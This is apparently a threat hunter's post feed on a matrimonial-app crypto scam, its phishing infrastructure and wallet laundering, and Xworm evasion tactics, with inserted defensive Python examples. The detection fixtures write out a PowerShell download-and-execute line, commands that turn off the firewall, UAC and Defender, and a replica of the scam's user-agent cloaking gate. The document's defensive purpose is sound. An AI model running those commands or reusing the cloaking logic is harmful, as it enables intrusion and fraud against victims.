You can follow the full story medium.com/adhd-attack-...
@cyb3rhawk
Cyb3rhawk leads a threat hunting team. Interested in DE&TH, threat intel and DFIR. Always striving to make the daily grind of SOC analysts a breeze. Always eager to learn from others and on the lookout for new ways to streamline what I learn.
Scale indicators:
$350,000 through one wallet (20 days)
891 domains across 48 countries
Multi-language support infrastructure
The attack surface expands as #Web3 adoption increases.
The technical attack is simple.
The #social #engineering makes it work.
Matrimonial platform targeting. Patient relationship building. Native language adaptation.
Standard: #Firebase hosting, CDN distribution, transit wallets, DEX swaps
Custom: #Flutter backend, dynamic #wallet rotation, multi-language support, identity harvesting
More infrastructure than commodity campaigns. Established operation with development resources.
Broader context: analyzed 1,855 #crypto #phishing URLs (Jan 2024 - Dec 2025).
658 unique IPs, 891 unique domains, 48 countries.
Top platforms: Firebase (web.app), Netlify, Vercel.
Elena case uses: Firebase + Fastly CDN + AWS backend.
Wallet timeline:
Most wallets activated: November 2025
Recent activity: Last 7 days
Initial transactions: 19 days ago
One outgoing wallet previously received funds from a wallet flagged as phishing.
Elena's operation = one campaign among many.
Some Externally Owned Account (EOA) wallets have a single inbound from the primary wallet and a single outbound to: HitBTC Hot Wallet 4.
HitBTC = known for lax KYC enforcement.
Primary wallet analysis:
In: 119.844 #ETH ($350k+)
Out: 119.837 ETH ($350k+)
Balance: 0.0064 ETH ($19.36)
High-throughput #transit node. Funds move immediately.
Uses TransitSwap v5 Router (DEX aggregator) to convert ETH → stablecoins (USDT/USDC).
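The two posts above (the single-in/single-out EOAs cashing out to an exchange hot wallet, and the primary wallet whose inflow and outflow nearly cancel) describe the same analytic: profile each address by total in, total out, residual balance and how long funds sit before leaving. The following is an added example, not code or chain data from the original thread. The ledger is constructed: addresses are placeholder labels, the amounts approximate the page's 119.844 ETH in / 119.837 ETH out figures, and gas is ignored, which is why the residual comes out slightly above the page's 0.0064 ETH. In practice the rows would come from an explorer export of each address polled from the loadWallet endpoints.

```python
from statistics import median

# Constructed ledger (not chain data from the page). Placeholder labels stand in
# for real addresses; amounts approximate the page's primary-wallet figures.
# Fields: (unix_ts, src, dst, eth)
LEDGER = [
    (0,     "victim_1", "PRIMARY",      40.000),
    (600,   "PRIMARY",  "TransitSwap",  39.990),
    (3600,  "victim_2", "PRIMARY",      35.500),
    (4200,  "PRIMARY",  "TransitSwap",  35.490),
    (7200,  "victim_3", "PRIMARY",      30.344),
    (7800,  "PRIMARY",  "TransitSwap",  30.337),
    (10800, "victim_4", "PRIMARY",      14.000),
    (11400, "PRIMARY",  "EOA_A",        14.020),
    (12000, "EOA_A",    "HitBTC_Hot_4", 14.010),
]

# Labels an analyst would attach from an attribution source (assumed here).
EXCHANGE_LABELS = {"HitBTC_Hot_4"}


def profile(addr, ledger):
    """Totals, residual balance and dwell time (seconds from the latest prior
    inbound to each outbound) for one address."""
    ins = [t for t in ledger if t[2] == addr]
    outs = [t for t in ledger if t[1] == addr]
    total_in = round(sum(t[3] for t in ins), 6)
    total_out = round(sum(t[3] for t in outs), 6)
    dwell = []
    for ts, _, _, _ in outs:
        prior = [i[0] for i in ins if i[0] <= ts]
        if prior:
            dwell.append(ts - max(prior))
    return {
        "in": total_in,
        "out": total_out,
        "balance": round(total_in - total_out, 6),
        "n_in": len(ins),
        "n_out": len(outs),
        "median_dwell_s": median(dwell) if dwell else None,
        "out_counterparties": sorted({t[2] for t in outs}),
    }


def is_transit_node(p, passthrough=0.98, max_dwell_s=3600):
    """A transit node forwards almost everything it receives, quickly.
    Thresholds are assumptions to tune per investigation."""
    if p["in"] <= 0 or p["median_dwell_s"] is None:
        return False
    return p["out"] / p["in"] >= passthrough and p["median_dwell_s"] <= max_dwell_s


def single_hop_cashouts(ledger, hub, exchanges):
    """Addresses with exactly one inbound (from the hub) and exactly one
    outbound (to a labelled exchange wallet): the EOA pattern in the post."""
    addrs = {t[1] for t in ledger} | {t[2] for t in ledger}
    hits = []
    for a in addrs:
        if a == hub:
            continue
        p = profile(a, ledger)
        ins = [t for t in ledger if t[2] == a]
        if (p["n_in"] == 1 and p["n_out"] == 1
                and ins[0][1] == hub
                and p["out_counterparties"][0] in exchanges):
            hits.append(a)
    return sorted(hits)


if __name__ == "__main__":
    p = profile("PRIMARY", LEDGER)
    print(p, "transit:", is_transit_node(p))
    print("single-hop cashouts:", single_hop_cashouts(LEDGER, "PRIMARY", EXCHANGE_LABELS))
```

The dwell metric is what separates a transit node from an ordinary active wallet: a trader's hot wallet can also show in ≈ out over a month, but its funds do not leave ten minutes after every deposit.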
URLscan.io shows t4smydata[.]com hosted a #Malay-language investment site ("Invest J") one year ago.
Same infrastructure. Different language. Different campaign.
This domain gets recycled: Malay → English/Chinese/Japanese/Korean.
Identity verification endpoints and banking info collection detected.
Possible future uses:
Identity fraud
Fake verification to build trust
Data resale on #dark #web markets
Full KYC harvesting capability.
Full infra observed:
Wallets: loadWalletUSDT/BTC/ETH.php
Accounts: loginUser.php, registerUser.php, updatePassword.php
Financial: createBuyCoin.php, createRecords.php, createWithdrawRecords.php
Identity: updateUserFrontIc.php, updateUserBackIc.php
Banking: updateUserBank.php
Three #PHP scripts fetch wallet addresses on demand:
loadWalletUSDT.php
loadWalletBTC.php
loadWalletETH.php
Real-time wallet rotation. Different victims see different addresses.
Console logs in Chinese: "在 App 内嵌浏览器中" ("inside the app's embedded browser").
The Flutter web app loads from t4smydata[.]com (3.0.56.137 - AWS Singapore).
Compiled Dart to #JavaScript. Uses CanvasKit/Skia rendering.
No hardcoded wallet addresses.
Instead: dynamic retrieval via PHP endpoints.
The Firebase page has JavaScript to vet traffic.
Checks user agent for in-app browsers (iOS WebView, Android WebView).
In-app browser? Load the malicious Flutter app. Standard browser? Redirect to legitimate coinbase.com.
#CryptoScam #Firebase #Web3Security
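The post above describes the gate: the Firebase page reads the user agent and only serves the Flutter app to in-app browsers, sending everyone else to the real coinbase.com. The page does not reproduce that JavaScript, so the following is an added example of the same decision logic, written here for analysts rather than taken from the campaign. The user-agent strings are constructed samples, and the markers tested (the Android `wv` token, the missing `Safari/` token on iOS WKWebView) are assumptions about what such checks commonly look for.

```python
import re

# Constructed user-agent samples (not captured from the campaign).
SAMPLE_UAS = {
    "android_webview": ("Mozilla/5.0 (Linux; Android 13; Pixel 7; wv) AppleWebKit/537.36 "
                        "(KHTML, like Gecko) Version/4.0 Chrome/120.0.0.0 Mobile Safari/537.36"),
    "ios_wkwebview":   ("Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) "
                        "AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148"),
    "ios_safari":      ("Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) "
                        "AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"),
    "android_chrome":  ("Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 "
                        "(KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36"),
    "desktop_chrome":  ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                        "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"),
}

PAYLOAD = "load_flutter_app"     # what a WebView visitor gets
DECOY = "redirect_coinbase.com"  # what everyone else gets


def is_in_app_browser(ua: str) -> bool:
    """Heuristics for the two WebView families the post says are checked.
    Assumption: the campaign's own JS is not on the page; these are the
    usual tells. Android Chrome WebView adds a 'wv' token to the platform
    section; iOS WKWebView/UIWebView omit the trailing 'Safari/' token
    that real Safari appends."""
    if "Android" in ua and re.search(r";\s*wv\)", ua):
        return True
    if re.search(r"iPhone|iPad|iPod", ua) and "AppleWebKit" in ua and "Safari/" not in ua:
        return True
    return False


def route_visitor(ua: str) -> str:
    """Mirror the gate: in-app browser -> payload, standard browser -> decoy."""
    return PAYLOAD if is_in_app_browser(ua) else DECOY


def triage(uas: dict) -> dict:
    """Replay a set of user agents against the gate to see which ones
    would ever reach the payload."""
    return {name: route_visitor(ua) for name, ua in uas.items()}


if __name__ == "__main__":
    for name, outcome in triage(SAMPLE_UAS).items():
        print(f"{name:16s} -> {outcome}")
```

The practical consequence for analysts: a sandbox or urlscan submission with a default desktop user agent only ever sees the redirect to coinbase.com and will score the page benign. Re-fetch with an Android `wv` or iOS WKWebView user agent (the matrimonial app's in-app browser is the intended path) before concluding the Firebase page is clean.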
"Elena" sends a link: www[.]bt-trade[.]it[.]com
Basic HTML page. Auto-redirects to Firebase hosting via authCheck() function.
First redirect lands at: bitplus-official[.]web[.]app
Both domains hosted on 199.36.158.100 (Google LLC).
#Infosec #CyberCrime #ThreatHunting #ScamAlert
Tracked a pig butchering operation from the #Indian #Matrimony search app to a wallet drainer.
One wallet. 20 days. $350,000+ in ETH.
Here's the technical breakdown:
#ThreatIntel #CryptoFraud #PigButchering #OSINT #BlockchainAnalysis #DetectionEngineering #CyberThreatIntelligence
Part 1 is live now. The Technical dive drops soon.
medium.com/@cyb3r-hawk/...
We often think victims are "clueless," but these try to exploit our most basic needs for "connection." It opens doors that otherwise would be kept closed.
The shift to crypto wasn't a "pitch." It was a casual mention of her portfolio during a talk about the future. By the time the link arrived, I wasn't talking to a "scammer" but someone who had been helpful, patient, and consistent.
#Infosec #Web3Security #SocialEngineering
I found her "personal" photos active on 5 sites targeting different diaspora groups with the same face.
#OSINT #SouthAsia #Diaspora
The persona, "Elena," followed the common practice of family-facilitated introductions. She spoke the native language, did a voice call, and understood the high baseline of trust in these spaces. No pressure, no red flags. Just days of "getting to know" each other.
I tracked a "Pig Butchering" scammer across several South Asian matrimonial platforms. This wasn't a bot or a crude script. It was a patient, human-led operation that used cultural trust as a weapon.
#CyberSecurity #CryptoScam #PigButchering #SocialEngineering #India #Matrimony
As recent SharePoint exploits settled a bit, I wanted to analyze payload variants to understand why attackers made specific choices. ASPX for quick access, DLLs for persistence, and IIS modules for blending in.
The goal of the blog (Soul instead of Shell) is to understand constraints that force payload decisions and how they can help us detect/hunt.
Every payload has a soul - and understanding it makes us better hunters.
medium.com/@cyb3r-hawk/...
(urlscan: page.url:http://bitbucket.org task.url:http://blogspot.com)
Hunt:
Who runs netsh + context?
How often Set-MpPreference is used?
Who creates exclusions, and when?
Key TTPs:
AMSI bypass (reflection, AMSIReaper, NukeAMSI)
COM hijacking for persistence
Defender exclusions (paths/exts/procs)
UAC bypass (EnableLUA)
Firewall off (netsh)
Set-MpPreference abuse
C2: Blogspot → bitbucket redirects
Recent #Xworm infections (esp. during tax season) follow a pattern:
mshta.exe → Scheduled Tasks → IEX execution.
#ThreatHunting #DetectionEngineering #MalwareAnalysis #DefenseEvasion
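The hunt questions and TTP list above (who runs netsh and in what context, how often Set-MpPreference appears, who creates exclusions and when, mshta spawning PowerShell that runs IEX) translate directly into rules over process-creation telemetry. The following is an added example, not part of the original posts: the events are constructed to look like the fields a SIEM keeps from Sysmon Event ID 1 or Security 4688, the host and user names are invented, and the escalation threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed process-creation events (not from the page).
EVENTS = [
    {"host": "WS01", "user": r"CORP\alice", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.txt')\""},
    {"host": "WS01", "user": r"CORP\alice", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -c "Set-MpPreference -ExclusionPath C:\Users\Public -ExclusionExtension .exe"'},
    {"host": "WS01", "user": r"CORP\alice", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"host": "WS01", "user": r"CORP\alice", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    # Admin-driven exclusion from a service account: a hit, but context differs.
    {"host": "SRV02", "user": r"CORP\svc-backup", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -c "Set-MpPreference -ExclusionPath D:\Backups"'},
    # Benign netsh usage that should not fire.
    {"host": "WS03", "user": r"CORP\bob", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmd": "netsh interface show interface"},
]

# Command-line rules for the TTPs listed in the post.
RULES = {
    "defender_exclusion": re.compile(r"Set-MpPreference\b.*-Exclusion(?:Path|Extension|Process)", re.I),
    "firewall_off": re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
    "uac_disable": re.compile(r"EnableLUA\b.*/d\s+0\b", re.I),
}


def tag_event(ev):
    """Return the set of TTP tags one event matches."""
    tags = {name for name, rx in RULES.items() if rx.search(ev["cmd"])}
    # Chain rule: PowerShell spawned by mshta and running IEX / Invoke-Expression.
    if (ev["parent"].lower().endswith("mshta.exe")
            and ev["image"].lower().endswith("powershell.exe")
            and re.search(r"\bIEX\b|Invoke-Expression", ev["cmd"], re.I)):
        tags.add("mshta_iex")
    return tags


def hunt(events):
    """Distinct TTPs observed per host."""
    per_host = defaultdict(set)
    for ev in events:
        for t in tag_event(ev):
            per_host[ev["host"]].add(t)
    return dict(per_host)


def escalate(per_host, min_distinct=2):
    """Hosts showing several distinct defense-evasion TTPs (threshold assumed)."""
    return sorted(h for h, tags in per_host.items() if len(tags) >= min_distinct)


def exclusion_context(events):
    """'Who creates exclusions, and when?': (host, user, parent) behind each
    exclusion so admin-driven ones can be baselined instead of alerted on."""
    return sorted({(ev["host"], ev["user"], ev["parent"].rsplit("\\", 1)[-1])
                   for ev in events if "defender_exclusion" in tag_event(ev)})


if __name__ == "__main__":
    print(hunt(EVENTS))
    print("escalate:", escalate(hunt(EVENTS)))
    print("exclusions:", exclusion_context(EVENTS))
```

Counting distinct TTPs per host is what makes the single noisy indicators usable: a lone Set-MpPreference from a backup service account is baseline material, while the same command on a workstation that also just turned the firewall off and flipped EnableLUA is the chain the post describes.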
Credential sellers: DaisyCloud (also sells RedLine stealer logs), moderdolboeb, m3g4
Distribution locations: https://t[.]me/+seHLUhOHbVhMDM0, breachforums, cracking[.]org, hard-tm[.]su, nohide[.]space, darknetarmy[.]com, niflheim[.]world, nulledbb[.]com.
We will end with the Hunting Hypothesis using A.P.E.X (lnkd.in/gJ9BmStA) and Adversary infrastructure queries to discover Lumma panels, C2s, etc.
Telegram distribution via t[.]me/hitbase, t[.]me/sharmamod disguised as IPTV or Netflix access.